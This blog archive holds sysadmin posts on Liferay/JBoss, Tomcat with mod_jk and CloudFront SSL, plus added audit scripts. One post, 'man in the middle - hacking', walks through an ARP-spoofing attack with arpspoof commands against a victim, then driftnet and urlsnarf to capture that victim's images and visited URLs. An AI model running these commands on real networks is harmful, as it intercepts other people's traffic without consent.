Wednesday, December 30, 2015

Liferay bundle with jboss + RHEL 7

These are the steps to install the Liferay JBoss bundle on Red Hat Enterprise Linux 7 (RHEL 7).

You can sign up and download Liferay from
https://www.liferay.com/downloads/liferay-portal/available-releases

In my case, I created /opt
and unzipped the zip file into it
# unzip liferay-portal-jboss-6.2-ee-sp14-20151105114451508.zip

Before starting anything, I had manually downloaded Java JDK 7 release 79 (7u79) and installed it
http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html

Once Liferay is extracted, run it once to confirm the file you downloaded works:
# cd /opt/<Liferay>/<jboss-version>/bin
# ./standalone.sh

You can test it by browsing to http://127.0.0.1:8080
By default standalone listens on 127.0.0.1 only, so on a Linux box installed without a GUI you need to change the bind address (or test from the box itself with curl).
Press CTRL+C to stop JBoss.

# cd ..
# cd standalone/configuration/
# vim standalone.xml

----------------  Default  -------------------
    <interfaces>
        <interface name="management">
            <inet-address value="${jboss.bind.address.management:127.0.0.1}"/>
        </interface>
        <interface name="public">
            <inet-address value="${jboss.bind.address:127.0.0.1}"/>
        </interface>
        <interface name="unsecure">
            <inet-address value="${jboss.bind.address.unsecure:127.0.0.1}"/>
        </interface>
    </interfaces>

-------------- Change to -----------------
    <interfaces>
        <interface name="management">
            <inet-address value="${jboss.bind.address.management:<your server ip>}"/>
        </interface>
        <interface name="public">
            <inet-address value="${jboss.bind.address:<your server ip>}"/>
        </interface>
        <interface name="unsecure">
            <inet-address value="${jboss.bind.address.unsecure:<your server ip>}"/>
        </interface>
    </interfaces>

----------------------------------------------

Only the "public" interface needs the server IP for the portal to be reachable; leaving "management" and "unsecure" on 127.0.0.1 keeps the management console (port 9990) and the native management port (9999) off the network, which is what you want on a server that faces users. The same result without editing the XML is to start with ./standalone.sh -b <your server ip>, which sets only jboss.bind.address.

Restart JBoss and test again with http://<server-IP>:8080
# cd ../../bin/
# ./standalone.sh
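As an added example (not part of the original post), the script below audits the <interfaces> block of a standalone.xml and warns when anything other than "public" is bound outside loopback. It assumes the AS 7 layout shown above and the default management ports (9990 for the console, 9999 for the native interface); the file path is whatever you pass as the first argument.

```shell
#!/bin/sh
# Added example (not from the original post): audit the <interfaces> block of a
# JBoss AS 7 standalone.xml. Only "public" should leave loopback; binding
# "management" and "unsecure" to the server IP exposes the management console
# (9990) and the native management port (9999) to the network.
# Usage: sh check_bind.sh /opt/<liferay>/<jboss>/standalone/configuration/standalone.xml
# Exit status 0 when only "public" is non-loopback, 1 otherwise.

# Print "name address" per interface. The value is usually an expression like
# ${jboss.bind.address:127.0.0.1}; the part after the colon is the default that
# applies unless -b/-bmanagement overrides it, so that is what we report.
list_interfaces() {
    awk '
        /<interface name="/ {
            match($0, /name="[^"]*"/)
            name = substr($0, RSTART + 6, RLENGTH - 7)
        }
        /<inet-address value="/ {
            match($0, /value="[^"]*"/)
            v = substr($0, RSTART + 7, RLENGTH - 8)
            sub(/^[$][{][^:}]*:/, "", v)   # drop "${jboss.bind.address:"
            sub(/[}]$/, "", v)             # and the closing brace
            print name, v
        }
    ' "$1"
}

is_loopback() {
    case "$1" in
        127.*|::1|localhost) return 0 ;;
        *) return 1 ;;
    esac
}

# 0 when every interface except "public" stays on loopback, 1 otherwise.
check_bind_addresses() {
    rc=0
    list_interfaces "$1" | while read -r name addr; do
        if [ "$name" != public ] && ! is_loopback "$addr"; then
            echo "WARN: interface '$name' is bound to $addr; keep it on 127.0.0.1"
            exit 1    # we are in the pipeline's subshell: this becomes the pipeline status
        fi
        echo "ok:   interface '$name' -> $addr"
    done || rc=1
    return $rc
}

# Run directly: check the file given on the command line.
if [ $# -eq 1 ]; then
    check_bind_addresses "$1"
fi
```

Run it against the file before every restart; a warning on "management" means the console is reachable by anyone who can reach the server IP, and the fix is either the XML default or starting with -b instead of editing the management entries.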


----------------  Connecting to MySQL Database  ---------------------
You need to download the MySQL connector from
https://www.mysql.com/products/connector/
choose JDBC Driver for MySQL (Connector/J)
extract the archive and copy mysql-connector-java-5.1.38-bin.jar
to this location
/opt/<Liferay-location>/<jboss-version>/modules/com/liferay/portal/main/
edit module.xml in that directory and
add this line inside <resources>
<resource-root path="mysql-connector-java-5.1.38-bin.jar" />

example:

        <resources>
                <resource-root path="hsql.jar" />
                <resource-root path="jtds.jar" />
                <resource-root path="mysql-connector-java-5.1.38-bin.jar" />
                <resource-root path="portal-service.jar" />
                <resource-root path="portlet.jar" />
                <resource-root path="postgresql.jar" />
        </resources>

------------------  Configure httpd to divert traffic to Liferay jboss ------------------
Install httpd and httpd-devel (apxs, needed to build mod_jk, comes with httpd-devel) plus a compiler
# yum install httpd httpd-devel gcc make

Download mod_jk (the tomcat-connectors source) from
https://tomcat.apache.org/download-connectors.cgi
extract it, cd into native/, then run configure, make and make install;
make install copies mod_jk.so into your Apache modules directory

If you encounter an error saying
no apache given
no netscape given
configure: error: Cannot find the WebServer

then you need to pass --with-apxs;
first find your apxs location
# find / -iname apxs
# ./configure --with-apxs=/usr/bin/apxs

Now go to /etc/httpd/conf.d/
create a worker.properties file and put this into it (the status worker must have the same name in worker.list and in its .type line, otherwise mod_jk logs an error at startup and the worker is not created)
# vim worker.properties

worker.list=worker1,node1,status
worker.status.type=status

#node1
worker.node1.port=8009
worker.node1.host=172.20.17.64
worker.node1.type=ajp13
worker.node1.lbfactor=1
worker.node1.ping_mode=A

# Load-balancing behaviour
worker.worker1.type=lb
worker.worker1.balance_workers=node1
worker.worker1.sticky_session=1


then create mod_jk.conf file and put this into it
# vim mod_jk.conf

LoadModule jk_module modules/mod_jk.so

<IfModule mod_jk.c>
JkWorkersFile /etc/httpd/conf.d/worker.properties
JkShmFile     /var/log/httpd/mod_jk.shm
JkLogFile     /var/log/httpd/mod_jk.log
JkLogLevel    info
JkLogStampFormat "[%a %b %d %H:%M:%S %Y] "

JkMount /* worker1
</IfModule>


Before starting Apache, configure JBoss to listen on port 8009 (AJP/1.3); by default only the HTTP connector is defined in standalone.xml.
AJP has no authentication of its own and trusts the front end for client attributes (remote address, SSL flags), so port 8009 must be reachable from the httpd host only: firewall it, and if httpd runs on the same box, bind the connector to 127.0.0.1.

# cd /opt/liferay-portal-6.2-ee-sp14/jboss-7.1.1/standalone/configuration/
# vim standalone.xml

----- default ------
        <subsystem xmlns="urn:jboss:domain:web:1.1" default-virtual-server="default-host" native="false">
            <configuration>
                <jsp-configuration development="true"/>
            </configuration>
            <connector name="http" protocol="HTTP/1.1" scheme="http" socket-binding="http"/>
            <virtual-server name="default-host" enable-welcome-root="false">
                <alias name="localhost"/>
                <alias name="example.com"/>
            </virtual-server>
        </subsystem>

------- change to  --------
        <subsystem xmlns="urn:jboss:domain:web:1.1" default-virtual-server="default-host" native="false">
            <configuration>
                <jsp-configuration development="true"/>
            </configuration>
            <connector name="ajp" protocol="AJP/1.3" scheme="http" socket-binding="ajp"/>
            <virtual-server name="default-host" enable-welcome-root="false">
                <alias name="localhost"/>
                <alias name="example.com"/>
            </virtual-server>
        </subsystem>
-----------------------------

Start the JBoss and httpd services and test by browsing to your server IP without port 8080 (httpd now forwards to JBoss over AJP).
Once the pages show up, the next step is a startup script.

---------- startup --------------

By default the jboss/bin/init.d directory already contains a startup script named jboss-as-standalone.sh
If you are using RHEL 6 or earlier, you can just symlink /etc/init.d/jboss to this file
for RHEL 7 it is a bit trickier since it uses systemd

but before that, edit jboss-as-standalone.sh (or the jboss-as.conf it sources) and define
JBOSS_CONF="/opt/<liferay-location>/<jboss-ver>/bin/init.d/jboss-as.conf"
JBOSS_HOME=/opt/<liferay-location>/<jboss-ver>
and make sure JBOSS_USER is an unprivileged account that owns the install tree, so the portal never runs as root

then go to /etc/systemd/system (local units belong there; /usr/lib/systemd/system is for units installed by packages)
create a jboss.service file and put this in it

[Unit]
Description=Jboss Application Server
After=syslog.target
After=network.target


[Service]
Type=forking
PIDFile=/var/run/jboss-as/jboss-as-standalone.pid
ExecStart=/opt/<liferay-location>/<jboss-ver>/bin/init.d/jboss-as-standalone.sh start
ExecStop=/opt/<liferay-location>/<jboss-ver>/bin/init.d/jboss-as-standalone.sh stop
TimeoutStartSec=300
TimeoutStopSec=300


[Install]
WantedBy=multi-user.target


then reload systemd and enable the unit (systemctl enable creates the symlink in /etc/systemd/system/multi-user.target.wants for you; do not create it by hand)
# systemctl daemon-reload
# systemctl enable jboss.service
# systemctl start jboss.service




Monday, August 10, 2015

man in the middle - hacking

Use netdiscover to find the IP range if you are not sure which one the network uses,
then use nmap to find out more about the hosts
# nmap 172.20.1.30
or
# nmap 172.20.1.1/24

Tools used
arpspoof (dsniff)
driftnet
urlsnarf (dsniff)

Set up IP forwarding (the linked page calls it port forwarding); without it the victim loses connectivity as soon as its traffic is redirected to you.
Change the value in /proc/sys/net/ipv4/ip_forward from 0 to 1:
# echo 1 > /proc/sys/net/ipv4/ip_forward
(see http://www.hacking-tutorial.com/tips-and-trick/how-to-set-up-port-forwarding-in-linux-and-windows/)




Victim IP address : 192.168.8.90

Attacker network interface : eth0; with IP address : 192.168.8.93

Router IP address : 192.168.8.8

Then run arpspoof so that both the victim and the router send their traffic through the attacker: the first command tells the victim that the attacker is the router, the second tells the router that the attacker is the victim (run each in its own terminal).
# arpspoof -i eth0 -t 192.168.8.90 192.168.8.8
# arpspoof -i eth0 -t 192.168.8.8 192.168.8.90

With forwarding enabled and both sides poisoned, every packet sent or received by the victim now passes through the attacker machine.
Now we can use driftnet to watch the images in the victim's traffic. According to its website,
Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.
To run driftnet, just run this
# driftnet -i eth0

To stop driftnet, close the driftnet window or press CTRL+C in the terminal

For the next step we capture the web addresses visited with urlsnarf. To use urlsnarf, just run this
# urlsnarf -i eth0

urlsnarf logs every URL the victim machine requests, so when the victim browses a website the attacker sees the address visited (it only parses plain HTTP; HTTPS URLs are not visible this way).

Wednesday, July 8, 2015

tomcat 7 setup guide

Tomcat Setup guide
This setup was done on CentOS 7

Tomcat 7
This is my own setup guide for my server.
You can change it according to your needs.

On the Tomcat 7 download page choose "Core" -> tar.gz

Tomcat 7.0 is designed to run on Java SE 6 and later, so download a matching JDK.
For more info, read the RELEASE-NOTES and RUNNING.txt files in the distribution.

For easy installation, I downloaded the rpm from the Oracle website and used localinstall
# yum localinstall jdk-7u80-linux-x64.rpm



Installation
1    Extract the file and put it at /opt

# cd /opt
# tar -zxvf apache-tomcat-7.0.62.tar.gz



2    Install tomcat native

# cd /opt/apache-tomcat-7.0.62/bin
# tar -zxvf tomcat-native.tar.gz
# cd tomcat-native-1.1.33-src/jni/native


Building tc-native requires three components to be installed:
- APR library
- OpenSSL libraries
- Java SE Development Kit (JDK)
# yum install apr-devel openssl-devel gcc make

Now build and install the native library with these commands

# ./configure --with-apr=/usr/bin/apr-1-config --with-java-home=/usr/java/jdk1.7.0_80/ --with-ssl=yes --prefix=/usr
# make
# make install

PS: update the Java location accordingly

3    Install commons-daemon-native (jsvc)

# cd /opt/apache-tomcat-7.0.62/bin
# tar -zxvf commons-daemon-native.tar.gz
# cd commons-daemon-1.0.15-native-src/unix
# ./configure --with-java=/usr/java/jdk1.7.0_80
# make
# cp jsvc ../..


Tuning
1    Edit /opt/apache-tomcat-7.0.62/conf/server.xml
Search for connectionTimeout and change the value to 600000
(10 minutes; an idle client holds a thread for that long, so keep it lower if Tomcat is reachable directly from the internet)
Search for maxThreads and change the value to 500 (if the attribute is present on the Connector you use)

2    Edit /opt/apache-tomcat-7.0.62/conf/context.xml
Change every <Context>
to <Context swallowOutput="true">
(this redirects System.out and System.err of the webapps to the catalina log)

3    Edit conf/logging.properties and add this
1catalina.org.apache.juli.AsyncFileHandler.rotatable = true
(this rotates the log)

4    Create setenv.sh in the bin directory and put this into it
---------------------------------------------------------------------------------------------------
JAVA_OPTS="-Xms4096m -Xmx4096m -XX:MaxPermSize=512m -Dorg.jboss.resolver.warning=true -Dsun.rmi.dgc.client.gcInterval=3600000 -Dsun.rmi.dgc.server.gcInterval=3600000 -Dsun.lang.ClassLoader.allowArraySyntax=true -Dhttp.maxConnections=500 -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode"

# Set the -Xms and -Xmx the same, around 50% to 80% of total memory
# Set the PermSize to either 256 or 512, increase it if there’s OutOfMemoryError PermGen space in log

# to see gc memory, add "-XX:+PrintGCDetails -XX:+PrintGCTimeStamps -verbose:gc -Xloggc:/tmp/gc.log"
---------------------------------------------------------------------------------------------------
Startup script

# vim /etc/init.d/tomcat

#!/bin/sh
#
# Tomcat startup script
#
# chkconfig: - 85 15
# description: Tomcat Server
# processname: tomcat
#
# To use this script run it as root - it will switch to the specified user
# (daemon.sh/jsvc binds the ports as root and then drops to TOMCAT_USER)
#
# Either modify this script for your requirements or just ensure that
# the following variables are set correctly before calling the script.

# define where tomcat is - this is the directory containing directories log, bin, conf etc
CATALINA_HOME=${CATALINA_HOME:-"/opt/tomcat"}
export CATALINA_HOME

# define the user under which tomcat will run, or use 'RUNASIS' to run as the current user
TOMCAT_USER=${TOMCAT_USER:-"tomcat"}
export TOMCAT_USER

# make sure java is in your path
JAVA_HOME=${JAVA_HOME:-"/usr/java/jdk"}
export JAVA_HOME


case "$1" in
start)
    "$CATALINA_HOME/bin/daemon.sh" start
    ;;
stop)
    "$CATALINA_HOME/bin/daemon.sh" stop
    # clear compiled JSPs; the variable is checked so an empty value can never expand to /work/*
    [ -n "$CATALINA_HOME" ] && rm -rf "$CATALINA_HOME"/work/*
    ;;
restart)
    "$0" stop
    # wait up to 60 s for jsvc to exit before forcing it
    i=0
    while pgrep -x jsvc >/dev/null && [ "$i" -lt 60 ]
    do
        sleep 1
        i=$((i + 1))
    done
    # force-kill only if it is still running (note: this kills every jsvc on the host)
    pgrep -x jsvc >/dev/null && /usr/bin/killall -9 jsvc
    "$0" start
    ;;
*)
    echo "usage: $0 (start|stop|restart)"
    ;;
esac



Edit the Java location and Tomcat location in the script (CATALINA_HOME must point at the directory you extracted, e.g. /opt/apache-tomcat-7.0.62)
then make it executable

# chmod 755 /etc/init.d/tomcat
then create the tomcat user (no shell, so nobody can log in as it)

# useradd -s /sbin/nologin tomcat

Give the Tomcat tree to the tomcat user (jsvc starts as root to bind the ports and then switches to this user)

# cd /opt
# chown -R tomcat:tomcat apache-tomcat-7.0.62



Add to startup list

# chkconfig --add tomcat

# chkconfig --level 2345 tomcat on


Connect to mysql



Get the JDBC driver (Connector/J) and put the jar in /opt/apache-tomcat-7.0.62/lib
http://www.mysql.com/products/connector/

Edit conf/context.xml
Add this under <Context swallowOutput="true">
Below is the example format

--------------------------------------------------------------------------------------------------------------
<Resource name="jdbc/TestDB" auth="Container" type="javax.sql.DataSource"
maxActive="100" maxIdle="30" maxWait="10000"
username="javauser" password="javadude" driverClassName="com.mysql.jdbc.Driver"
url="jdbc:mysql://localhost:3306/javatest"/>

--------------------------------------------------------------------------------------------------------------

Change name, username, password and url to match your database. context.xml now holds a database password in clear text, so keep it readable by the tomcat user only (mode 640, owned by tomcat or by root:tomcat) and give that MySQL account only the privileges the application needs.

maxActive = Maximum number of database connections in the pool. Make sure your mysqld max_connections is large enough to handle all of your DB connections. Set to -1 for no limit.
maxIdle = Maximum number of idle database connections to retain in the pool. Set to -1 for no limit.
maxWait = Maximum time in ms to wait for a database connection to become available; an exception is thrown if this timeout is exceeded. Set to -1 to wait indefinitely.
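Added example (not from the original guide): rather than chown -R tomcat:tomcat on the whole tree, the script below leaves the install owned by root, gives the tomcat user write access only to logs/, temp/ and work/, and keeps conf/ (which now holds the database password from context.xml) unreadable by anyone outside the tomcat group. Directory, user and group are arguments; the owner defaults to root and is a parameter only so the audit can be exercised without root. It assumes GNU stat and find (Linux).

```shell
#!/bin/sh
# Added example (not from the original guide): least-privilege ownership for a
# Tomcat install tree instead of "chown -R tomcat:tomcat" on everything.
# - install tree owned by OWNER (root), group GROUP, no world access
# - USER (the service account) may write only logs/, temp/ and work/
# - conf/ stays OWNER-owned and group-readable, so the DB password in
#   context.xml is readable by Tomcat but by nobody else
# Usage: sh harden_tomcat.sh /opt/apache-tomcat-7.0.62 tomcat [GROUP] [OWNER]
# (OWNER is a parameter only so the audit can be exercised without root.)

harden_tomcat_perms() {
    home=$1; user=$2; group=${3:-$2}; owner=${4:-root}
    [ -d "$home" ] || { echo "no such directory: $home" >&2; return 1; }
    chown -R "$owner":"$group" "$home"
    find "$home" -type d -exec chmod 750 {} +
    find "$home" -type f -exec chmod 640 {} +
    # scripts and the jsvc binary must stay executable for owner and group
    for x in "$home"/bin/*.sh "$home"/bin/jsvc; do
        if [ -f "$x" ]; then chmod 750 "$x"; fi
    done
    # runtime directories are the only places the service account writes
    for d in logs temp work; do
        mkdir -p "$home/$d"
        chown -R "$user":"$group" "$home/$d"
        chmod 750 "$home/$d"
    done
    return 0
}

# Print offending entries and return 1 if anything under HOME is world-readable
# or if the two sensitive config files are world-accessible; 0 when clean.
audit_tomcat_perms() {
    home=$1; rc=0
    world=$(find "$home" -perm -004 -print | head -n 5)
    if [ -n "$world" ]; then
        echo "WARN: world-readable entries under $home (first few):"; echo "$world"; rc=1
    fi
    for f in "$home/conf/context.xml" "$home/conf/server.xml"; do
        [ -f "$f" ] || continue
        case "$(stat -c %a "$f")" in          # GNU stat: octal mode, e.g. 640
            *[1-7]) echo "WARN: $f is world-accessible"; rc=1 ;;
        esac
    done
    return $rc
}

# Run directly: harden, then audit the result.
if [ $# -ge 2 ]; then
    harden_tomcat_perms "$@" && audit_tomcat_perms "$1"
fi
```

With this layout the init script's "rm -rf $CATALINA_HOME/work/*" still works, because work/ belongs to the service account, while a compromised webapp can no longer rewrite Tomcat's own jars or scripts. If you deploy through the manager webapp, add webapps/ to the writable list.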


Apache

Install Apache and fine tune it


1. Install the MOD_JK connector

# yum install httpd httpd-devel gcc make

Go to https://tomcat.apache.org/download-connectors.cgi and download the source
In the native/ directory of the tarball run configure, make and make install
make install copies mod_jk.so into the httpd modules directory (/etc/httpd/modules on RHEL/CentOS); if you copy it by hand, that is the path

PS: if you get the error "configure: error: Cannot find the WebServer",
use this to find apxs
# find / -iname apxs
then configure using this command
# ./configure --with-apxs=/usr/bin/apxs

# chmod 755 /etc/httpd/modules/mod_jk.so


Create workers.properties
The node names must match the jvmRoute of each Tomcat (the jvmRoute attribute on <Engine> in server.xml must equal the worker name, otherwise sticky sessions do not work). The file location is whatever JkWorkersFile points to in mod_jk.conf. Keep comments on their own line; a "#" at the end of a value line is not a comment to mod_jk.

--------------------------------------------------------------------------------------------------------------------
# node names you want to use; set the same names as jvmRoute in server.xml
worker.list=worker1,node1,node2,status
worker.status.type=status

#node1
worker.node1.port=8009
worker.node1.host=10.0.3.129
worker.node1.type=ajp13
worker.node1.lbfactor=1
worker.node1.ping_mode=A
#worker.node1.cachesize=10

#node2
worker.node2.port=8009
worker.node2.host=10.0.3.130
worker.node2.type=ajp13
worker.node2.lbfactor=3
worker.node2.ping_mode=A
#worker.node2.cachesize=10

# Load-balancing behaviour
worker.worker1.type=lb
worker.worker1.balance_workers=node1,node2
worker.worker1.sticky_session=1

--------------------------------------------------------------------------------------------------------------------


Create mod_jk.conf

-------------------------------------------------------------------------------------------------------------------
LoadModule jk_module modules/mod_jk.so

<IfModule mod_jk.c>
JkWorkersFile /data/sys/etc/httpd/workers.properties
JkShmFile /var/log/httpd/mod_jk.shm
JkLogFile /var/log/httpd/mod_jk.log
JkLogLevel info
JkLogStampFormat "[%a %b %d %H:%M:%S %Y] "


# mount only the application's URL space, edit as necessary (httpd does not allow a comment after a directive, so keep it on its own line)
# DO NOT MOUNT EVERYTHING!
JkMount /app/* worker1
</IfModule>
------------------------------------------------------------------------------------------------------------------
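The following lint is an added example, not part of the original posts; it applies to this workers.properties/mod_jk.conf pair and equally to the one in the Liferay post above. It verifies that every worker named in worker.list has a type (a "status" listed in worker.list while only "jkstatus" has a type is caught), that every member of an lb worker is defined, and it warns on JkMount /* and on a status worker mounted without a <Location> block in the same file. File paths are arguments; the <Location> test is a heuristic that only checks the tag exists somewhere in that file.

```shell
#!/bin/sh
# Added example (not from the original posts): lint workers.properties and
# mod_jk.conf before reloading httpd.
# Usage: sh check_jk.sh workers.properties mod_jk.conf

# Value of a key in a properties file, trimmed. Keep comments on their own
# line in the real file; a trailing "# ..." is stripped here only so that a
# file with that mistake still gets the other checks.
prop() {
    sed -n "s/^[[:space:]]*$2[[:space:]]*=//p" "$1" |
        sed 's/#.*//; s/^[[:space:]]*//; s/[[:space:]]*$//' | head -n 1
}

# Names of workers defined with type=status.
status_workers() {
    sed -n 's/^[[:space:]]*worker\.\([^.=[:space:]]*\)\.type[[:space:]]*=[[:space:]]*status[[:space:]]*$/\1/p' "$1"
}

# 0 if every name in worker.list has a type and every lb member is defined.
check_workers() {
    f=$1; rc=0
    list=$(prop "$f" worker.list | tr ',' ' ')
    [ -n "$list" ] || { echo "ERROR: no worker.list in $f"; return 1; }
    for w in $list; do
        t=$(prop "$f" "worker.$w.type")
        if [ -z "$t" ]; then
            echo "ERROR: '$w' is in worker.list but worker.$w.type is not defined"
            rc=1
            continue
        fi
        echo "ok:    worker '$w' type=$t"
        if [ "$t" = lb ]; then
            for m in $(prop "$f" "worker.$w.balance_workers" | tr ',' ' '); do
                [ -n "$(prop "$f" "worker.$m.type")" ] ||
                    { echo "ERROR: lb worker '$w' balances undefined worker '$m'"; rc=1; }
            done
        fi
    done
    return $rc
}

# 0 unless everything is mounted, or a status worker is mounted while the file
# has no <Location> block at all (heuristic: only the tag is checked).
check_mounts() {
    conf=$1; workers=$2; rc=0
    if grep -Eq '^[[:space:]]*JkMount[[:space:]]+/\*[[:space:]]' "$conf"; then
        echo "WARN:  JkMount /* proxies every path to Tomcat; mount only the application's paths"
        rc=1
    fi
    for s in $(status_workers "$workers"); do
        if grep -Eq "^[[:space:]]*JkMount[[:space:]]+[^[:space:]]+[[:space:]]+$s[[:space:]]*\$" "$conf" &&
           ! grep -q '<Location' "$conf"; then
            echo "WARN:  status worker '$s' is mounted without a <Location> restriction"
            rc=1
        fi
    done
    return $rc
}

# Run directly: lint both files and exit non-zero on any finding.
if [ $# -eq 2 ]; then
    check_workers "$1"; w=$?
    check_mounts "$2" "$1"; m=$?
    exit $((w + m))
fi
```

The status page can change worker state (disable a node, edit its load factor), so when you do mount it, put the JkMount inside a <Location> with an IP restriction (Require ip on httpd 2.4) rather than at top level.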

Thursday, February 12, 2015

Amazon AWS CloudFront setup Custom SSL Certificate

Here I will show how I enabled the custom SSL certificate option in CloudFront.

SSL cert preparation
There are a few things you need to prepare:
1. Private key (.pem)
2. Certificate, i.e. the public part issued by the CA (.pem)
3. Certificate chain file (.pem)

If you have your private.key and public.crt from the CA,
you can use the commands below to convert them to plain PEM format (IAM wants the bare PEM blocks, and the private key must be unencrypted)

openssl rsa -in Private.key -out Private.pem

openssl x509 -in Public.crt -out Public.pem
(add -inform DER if the CA gave you a binary .crt/.der; do not use -text, which puts a human-readable dump in front of the PEM block and is not what IAM expects)

For the certificate chain file,
once you have deployed your SSL cert on your web server
you can use this link to check what the chain looks like, as different providers use different chains
https://ssltools.thawte.com/checker/views/certCheck.jsp

Example 1

For Facebook, there is only 1 intermediate cert in the chain


Example 2

For this one, there are 2 intermediate certs in the chain

From AWS documentation, the sample certificate chain will be look like this

-----BEGIN CERTIFICATE-----
Intermediate certificate 2
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
Intermediate certificate 1
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
Optional: Root certificate
-----END CERTIFICATE-----


So after you have checked what your certificate chain looks like,
all you need to do is find those certs and combine them

For example 1 (Facebook), there is only 1 intermediate cert in the chain, so DigiCert High Assurance CA-3 can be used directly as the certificate chain

For example 2 (Gardenbythebay), there are 2 intermediate certs in the chain, so copy and paste them in the sequence below (the CA that issued your cert first, then the CA that signed it) and save it as certificate_chain.pem

-----BEGIN CERTIFICATE-----
< Thawte SSL CA - G2 >
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
< thawte Primary Root CA >
-----END CERTIFICATE-----

NOTE:
I am using Thawte as well, so here I provide the links for both intermediate certs
Thawte SSL CA - G2
Thawte Primary Root CA
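Added example, not from the original post: a quick lint of the three PEM files before running aws iam upload-server-certificate. It flags a key file that still has the human-readable dump from openssl -text in front of the PEM block, a certificate file with more than one certificate in it, a chain with unbalanced BEGIN/END markers, and a private key concatenated into the chain by mistake. File names are arguments; the base64 check is structural only and does not validate the certificates or their order.

```shell
#!/bin/sh
# Added example (not from the original post): check the three PEM files before
# "aws iam upload-server-certificate". Typical mistakes caught here:
#  - key written with "openssl rsa -text", so a text dump precedes the PEM block
#  - certificate file holding more than one certificate (the chain goes elsewhere)
#  - chain file with an unbalanced or mislabelled BEGIN/END pair
#  - private key pasted into the chain (or certificate) file by accident
# Usage: sh check_pem.sh Public.pem Private.pem certificate_chain.pem

# Number of "-----BEGIN <label>-----" lines in a file (0 prints 0, exit masked).
count_blocks() {
    grep -c "^-----BEGIN $2-----\$" "$1" || true
}

# Number of private-key blocks of any type (RSA PRIVATE KEY, PRIVATE KEY, ...).
count_keys() {
    grep -c '^-----BEGIN .*PRIVATE KEY-----$' "$1" || true
}

# 0 when the file is nothing but well-formed PEM blocks: every BEGIN has an END
# with the same label, only base64 inside a block, only blank lines outside.
pem_clean() {
    awk '
        { sub(/\r$/, "") }                         # tolerate CRLF
        /^-----BEGIN / { if (open) bad = 1
                         open = 1; label = $0
                         sub(/^-----BEGIN /, "", label); sub(/-----$/, "", label); next }
        /^-----END /   { l = $0; sub(/^-----END /, "", l); sub(/-----$/, "", l)
                         if (!open || l != label) bad = 1
                         open = 0; next }
        open           { if ($0 !~ /^[A-Za-z0-9+\/=]+$/) bad = 1; next }
        NF             { bad = 1 }                 # text outside a block, e.g. an openssl -text dump
        END            { exit (bad || open) ? 1 : 0 }
    ' "$1"
}

# 0 when cert/key/chain each contain what IAM expects, 1 otherwise (reasons printed).
check_cert_files() {
    cert=$1; key=$2; chain=$3; rc=0
    for f in "$cert" "$key" "$chain"; do
        [ -r "$f" ] || { echo "ERROR: cannot read $f"; return 1; }
        pem_clean "$f" || { echo "ERROR: $f is not clean PEM (unbalanced block or extra text)"; rc=1; }
    done
    [ "$(count_blocks "$cert" CERTIFICATE)" -eq 1 ]  || { echo "ERROR: $cert must hold exactly one certificate"; rc=1; }
    [ "$(count_keys "$cert")" -eq 0 ]                || { echo "ERROR: $cert contains a private key"; rc=1; }
    [ "$(count_keys "$key")" -eq 1 ]                 || { echo "ERROR: $key must hold exactly one private key"; rc=1; }
    [ "$(count_blocks "$key" CERTIFICATE)" -eq 0 ]   || { echo "ERROR: $key contains a certificate"; rc=1; }
    [ "$(count_blocks "$chain" CERTIFICATE)" -ge 1 ] || { echo "ERROR: $chain holds no certificate"; rc=1; }
    [ "$(count_keys "$chain")" -eq 0 ]               || { echo "ERROR: $chain contains a private key; never upload this"; rc=1; }
    [ $rc -eq 0 ] && echo "ok: $cert, $key and $chain look like clean PEM"
    return $rc
}

# Run directly with the three files in the same order as the aws command.
if [ $# -eq 3 ]; then
    check_cert_files "$1" "$2" "$3"
fi
```

To also confirm that the chain is in the right order and reaches a trusted root, run openssl verify -untrusted certificate_chain.pem Public.pem on the same files; it fails if an intermediate is missing or the order is wrong.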


Upload into the IAM store

Now that you have all 3 files, it is time to upload them to the IAM store
I just went to EC2 and launched a micro instance for this purpose.
Choose Amazon Linux for the instance because the AWS CLI is preinstalled; on other distros you need to install it manually. The instance role (or the access keys you configure) needs the iam:UploadServerCertificate permission.


1. Once the instance is up, upload all 3 files to the server.
On Windows you can use WinSCP; it authenticates with the instance key pair (convert the .pem to .ppk with PuTTYgen), so there is no need to turn on PasswordAuthentication in /etc/ssh/sshd_config, leave it off. Remember that the private key now sits on that instance: delete it once the upload is done, or run the AWS CLI from your own workstation and skip the instance altogether.


2. use this command to upload your file
aws iam upload-server-certificate --server-certificate-name CertificateName --certificate-body file://public_key_certificate_file --private-key file://privatekey.pem --certificate-chain file://certificate_chain_file --path /cloudfront/path/

example:
aws iam upload-server-certificate --server-certificate-name Facebook2015 --certificate-body file://~/Public.pem --private-key file://~/Private.pem --certificate-chain file://~/certificate_chain.pem --path /cloudfront/Facebook/

Once done, you should see output like this

{

  "ServerCertificateMetadata": {
     "ServerCertificateId": "ASCAJR5WQNL4PIB4GMMNE",
     "ServerCertificateName": "Facebook2015",
     "Expiration": "2017-04-23T23:59:59Z",
     "Path": "/cloudfront/Facebook/",
     "Arn": "arn:aws:iam::337660227660:server-certificate/cloudfront/Facebook/Facebook2015",
     "UploadDate": "2015-02-11T03:36:56.032Z"
  } 
}

Now you should be able to choose a custom SSL certificate in CloudFront


Other commands

delete certificate object:

aws iam delete-server-certificate --server-certificate-name certificate_object_name

example:
aws iam delete-server-certificate --server-certificate-name Facebook2015


View Certificate object:

aws iam get-server-certificate --server-certificate-name certificate_object_name

example:
aws iam get-server-certificate --server-certificate-name Facebook2015